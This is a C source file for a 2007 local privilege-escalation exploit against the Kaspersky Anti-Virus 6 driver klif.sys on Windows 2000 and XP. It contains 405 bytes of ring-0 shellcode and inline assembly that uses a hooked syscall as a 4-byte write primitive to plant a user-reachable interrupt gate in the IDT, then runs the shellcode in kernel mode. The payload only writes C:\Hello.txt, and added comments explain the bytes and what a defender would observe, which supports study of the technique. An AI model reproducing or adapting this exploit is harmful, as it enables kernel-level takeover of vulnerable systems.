`// kav 6.0 0day local priv escalation exploit
// by m4d
// http://unl0ck.net
#include <windows.h>
#include <stdlib.h>
#include <stdio.h>
// r0-shellcode creates C:\Hello.txt with "Hello from ring-0! :)"
// 405 bytes (25 rows of 16 plus 5) of 32-bit x86 machine code. main() makes an
// IDT interrupt gate point at this array, so it runs at ring 0 even though it
// lives in the process's writable data section.
//
// Layout, as read from the bytes:
//   - 0x55 0x8B 0xEC 0x83 0xC4 0xBC 0x60: push ebp / mov ebp,esp / add esp,-44h / pushad.
//     It then executes sidt (0x0F 0x01 ...) and reads the handler address of IDT
//     vector 0x2A (the add of 0x150 = 0x2A*8), then walks downward until it finds
//     an "MZ"/"PE" header, i.e. the base of the image owning that handler
//     (presumably the kernel image).
//   - Embedded ASCII strings "ZwCreateFile", "ZwClose", "ZwWriteFile" are resolved
//     by name through the routine at the very end of the array (0x60 ... 0x61 0xC3,
//     pushad..popad/ret), which walks a PE export directory (e_lfanew at 0x3C,
//     export table via data directory 0x78, names at +0x20, ordinals at +0x24,
//     functions at +0x1C).
//   - Embedded UTF-16 path L"\??\C:\Hello.txt" and the line "Hello from ring-0! :)\r\n"
//     are the file and its content.
//   - Exit: popad / mov eax,[ebp-18h] / leave / iretd (0x61 0x8B 0x45 0xE8 0xC9 0xCF),
//     returning from the int 0DAh that main() issues.
//
// Defender note: the observable artefact of this proof of concept is C:\Hello.txt
// with that content, alongside the rewritten IDT descriptor for vector 0xDA.
unsigned char Shellcode[405] = {
0x55, 0x8B, 0xEC, 0x83, 0xC4, 0xBC, 0x60, 0x83, 0x4D, 0xE8, 0xFF, 0x0F, 0x01, 0x4D, 0xFA, 0x8B,
0x4D, 0xFC, 0x81, 0xC1, 0x50, 0x01, 0x00, 0x00, 0x66, 0x8B, 0x71, 0x06, 0xC1, 0xE6, 0x10, 0x66,
0x8B, 0x31, 0x4E, 0x66, 0x81, 0x3E, 0x4D, 0x5A, 0x75, 0xF8, 0x8B, 0x46, 0x3C, 0xA9, 0x00, 0xFF,
0xFF, 0xFF, 0x75, 0xEE, 0x81, 0x3C, 0x30, 0x50, 0x45, 0x00, 0x00, 0x75, 0xE5, 0xE8, 0x00, 0x00,
0x00, 0x00, 0x58, 0x8D, 0x90, 0xB7, 0x00, 0x00, 0x00, 0x8D, 0x5A, 0x58, 0x8B, 0xC6, 0x6A, 0x0D,
0x59, 0xFF, 0xD3, 0x89, 0x45, 0xEC, 0x03, 0xD1, 0x8B, 0xC6, 0x6A, 0x08, 0x59, 0xFF, 0xD3, 0x89,
0x45, 0xF0, 0x03, 0xD1, 0x8B, 0xC6, 0x6A, 0x0C, 0x59, 0xFF, 0xD3, 0x89, 0x45, 0xF4, 0x03, 0xD1,
0x89, 0x55, 0xE4, 0x6A, 0x20, 0x58, 0x66, 0x89, 0x45, 0xE0, 0x66, 0x89, 0x45, 0xE2, 0x8D, 0x4D,
0xC0, 0xC7, 0x01, 0x18, 0x00, 0x00, 0x00, 0x83, 0x61, 0x04, 0x00, 0xC7, 0x41, 0x0C, 0x00, 0x02,
0x00, 0x00, 0x83, 0x61, 0x10, 0x00, 0x8D, 0x45, 0xE0, 0x89, 0x41, 0x08, 0x83, 0x61, 0x14, 0x00,
0x6A, 0x00, 0x6A, 0x00, 0x6A, 0x20, 0x6A, 0x03, 0x6A, 0x00, 0x6A, 0x00, 0x6A, 0x00, 0x8D, 0x45,
0xD8, 0x50, 0x8D, 0x45, 0xC0, 0x50, 0x68, 0x04, 0x00, 0x10, 0x00, 0x8D, 0x45, 0xBC, 0x50, 0xFF,
0x55, 0xEC, 0x85, 0xC0, 0x75, 0x2D, 0x6A, 0x00, 0x6A, 0x00, 0x6A, 0x17, 0x8B, 0x45, 0xE4, 0x0F,
0xB7, 0x4D, 0xE0, 0x03, 0xC1, 0x50, 0x8D, 0x45, 0xD8, 0x50, 0x6A, 0x00, 0x6A, 0x00, 0x6A, 0x00,
0xFF, 0x75, 0xBC, 0xFF, 0x55, 0xF4, 0xFF, 0x75, 0xBC, 0xFF, 0x55, 0xF0, 0xC7, 0x45, 0xE8, 0xEF,
0xBE, 0xAD, 0xDE, 0x61, 0x8B, 0x45, 0xE8, 0xC9, 0xCF, 0x5A, 0x77, 0x43, 0x72, 0x65, 0x61, 0x74,
0x65, 0x46, 0x69, 0x6C, 0x65, 0x00, 0x5A, 0x77, 0x43, 0x6C, 0x6F, 0x73, 0x65, 0x00, 0x5A, 0x77,
0x57, 0x72, 0x69, 0x74, 0x65, 0x46, 0x69, 0x6C, 0x65, 0x00, 0x5C, 0x00, 0x3F, 0x00, 0x3F, 0x00,
0x5C, 0x00, 0x43, 0x00, 0x3A, 0x00, 0x5C, 0x00, 0x48, 0x00, 0x65, 0x00, 0x6C, 0x00, 0x6C, 0x00,
0x6F, 0x00, 0x2E, 0x00, 0x74, 0x00, 0x78, 0x00, 0x74, 0x00, 0x48, 0x65, 0x6C, 0x6C, 0x6F, 0x20,
0x66, 0x72, 0x6F, 0x6D, 0x20, 0x72, 0x69, 0x6E, 0x67, 0x2D, 0x30, 0x21, 0x20, 0x3A, 0x29, 0x0D,
0x0A, 0x60, 0x8B, 0x50, 0x3C, 0x8B, 0x54, 0x10, 0x78, 0x03, 0xD0, 0x8B, 0x5A, 0x20, 0x03, 0xD8,
0x33, 0xED, 0x8B, 0x4A, 0x18, 0x51, 0x8B, 0x4C, 0x24, 0x1C, 0x8B, 0x33, 0x03, 0xF0, 0x8B, 0x7C,
0x24, 0x18, 0xF3, 0xA6, 0x59, 0x74, 0x06, 0x45, 0x83, 0xC3, 0x04, 0xE2, 0xE8, 0x8B, 0x4A, 0x24,
0x03, 0xC8, 0x0F, 0xB7, 0x0C, 0x69, 0x8B, 0x6A, 0x1C, 0x03, 0xE8, 0x95, 0x03, 0x2C, 0x88, 0x89,
0x6C, 0x24, 0x1C, 0x61, 0xC3
};
// First argument block handed to the klif.sys system-call handler: main()
// issues int 2Eh with edx -> { &FIRST_PARAM, Param2 }. The layout and field
// meanings are inferred from how main() fills them in, not from a header.
typedef struct _FIRST_PARAM {
ULONG SwitchIndex; // selects a case in the driver's switch(); main() uses 3 for the write
ULONG Unknown; // 0xFF0002..0xFF000F; if this value is not in klif.sys's accepted list, the exploit does not work
ULONG Value; // the 32-bit value the driver writes to the address supplied as the second argument
} FIRST_PARAM, *PFIRST_PARAM;
// Entry point. `void main` is non-standard (exit status unspecified); argc/argv
// are unused. Everything here is Win32/MSVC-specific: __try/__except, __asm,
// and the legacy int 2Eh system-call entry (eax = service number, edx = argument
// pointer) instead of the documented API.
//
// Flow: restrict to Windows 2000/XP (5.0/5.1) -> probe for KAV 6 with a
// version-specific syscall -> use a klif.sys-hooked syscall as a 4-byte write
// primitive, twice, to replace IDT descriptor 0xDA with a DPL-3 interrupt gate
// whose target is the user-mode Shellcode array -> `int 0DAh` -> Shellcode runs
// at ring 0 and returns with iretd.
//
// Defender's view: artefacts are a rewritten IDT entry (vector 0xDA, DPL 3,
// target in user space) and, for this payload, C:\Hello.txt; the remedy is the
// vendor fix to klif.sys. Executing a user-space buffer in kernel mode is what
// later SMEP/SMAP-class mitigations block. The __except below only covers
// user-mode faults; a fault while the gate handler runs at ring 0 crashes the
// machine instead of reaching it.
void main(int argc, char* argv[])
{
__try
{
FIRST_PARAM Param1;
ULONG Param2; // target address given to the driver; the write appears to land at Param2 + 8 (hence the "- 8" below) -- presumably, confirm against klif.sys
CHAR Idtr[6]; // IDTR image stored by sidt: 16-bit limit, then the 32-bit linear base at [Idtr+2]
CHAR IsKAVInstalled; // set by the first __asm block: 1 when the probe syscall returned 0xC
OSVERSIONINFOEX os;
os.dwOSVersionInfoSize = sizeof(OSVERSIONINFOEX);
GetVersionEx((LPOSVERSIONINFO)&os); // return value is not checked; on failure the fields read below are uninitialised
if (os.dwPlatformId != VER_PLATFORM_WIN32_NT ||
os.dwMajorVersion != 5 ||
os.dwMinorVersion > 1) // only 2000 (5.0) and XP (5.1): the syscall numbers below are hard-coded per version
{
printf("This OS version unsupported\n");
return;
}
// Probe for KAV 6 (the original comment here was lost in extraction).
// Issues service 0xF8 on 2000 or 0x11C on XP via int 2Eh and treats a
// return value of 0xC as "klif.sys is present" -- presumably a service the
// driver hooks. Note that edx (the argument pointer) is not set before
// int 2Eh, so the call runs with whatever edx happens to hold.
__asm {
cmp os.dwMinorVersion, 0
jnz short $+13 // hand-counted byte displacement to the XP mov; brittle, and not obviously consistent with a 2-byte jnz + 5-byte mov + 2-byte jmp
mov eax, 0F8h // 2k
jmp short $+7 // skip the XP mov (2 + 5 bytes)
mov eax, 11Ch // xp
int 2Eh // legacy NT system-call entry
cmp eax, 0Ch
setz al
mov IsKAVInstalled, al
}
if (!IsKAVInstalled)
{
printf("KAV6 didn't installed\n");
return;
}
Param1.SwitchIndex = 3; // Index of jmp in case of switch() -- i.e. the driver's case that performs the write
Param1.Unknown = 0xFF0002;
// Build the 8-byte IDT gate descriptor for vector 0xDA in two 4-byte writes.
// Descriptor layout: low dword = [selector:16 | offset bits 0-15];
// high dword = [offset bits 16-31 | attributes:8 | reserved:8].
__asm {
pusha
sidt Idtr // capture the IDT base for this CPU
mov eax, dword ptr [Idtr+2]
add eax, 0DAh * 8 - 8 // &IDT[0xDA] (8-byte descriptors), minus the driver's +8 bias
mov Param2, eax
// Write lower DWORD IdtEntry
mov ecx, offset Shellcode
and ecx, 0000FFFFh
or ecx, 00080000h // 0x0008 = ring-0 code segment selector
mov Param1.Value, ecx // Set DWORD: [selector 0x0008 | LOWORD(Shellcode)]
push Param2
lea eax, Param1
push eax
mov edx, esp // edx -> { &Param1, Param2 }: the argument block for the service
cmp os.dwMinorVersion, 0
jnz short $+13 // same hand-counted displacement as in the probe block above
mov eax, 100h // 2k
jmp short $+7
mov eax, 124h // xp
int 2Eh // hooked service performs the 4-byte write
add esp, 2*4 // drop the two pushed arguments
// Write high DWORD IdtEntry
add Param2, 4
mov ecx, offset Shellcode
and ecx, 0FFFF0000h
or ecx, 0000EE00h // 0xEE = present, DPL 3 (reachable from user mode), 32-bit interrupt gate
mov Param1.Value, ecx // Set DWORD: [HIWORD(Shellcode) | gate parameters 0xEE00]
push Param2
lea eax, Param1
push eax
mov edx, esp
cmp os.dwMinorVersion, 0
jnz short $+13
mov eax, 100h // 2k
jmp short $+7
mov eax, 124h // xp
int 2Eh
add esp, 2*4
// Call Gate :-) (COLGATE) -- strictly an interrupt gate; either way the CPU
// switches to ring 0 and jumps to Shellcode, which returns here with iretd.
push fs // fs saved/restored around the trap, presumably because the kernel path may leave it changed -- confirm
int 0DAh
pop fs
popa
}
printf("Exploited successful\n");
}
__except(1) { // 1 == EXCEPTION_EXECUTE_HANDLER: swallows any user-mode fault from the blocks above
printf("Can't create interrupt gate\n");
}
}
// 15.01.07 MaD
`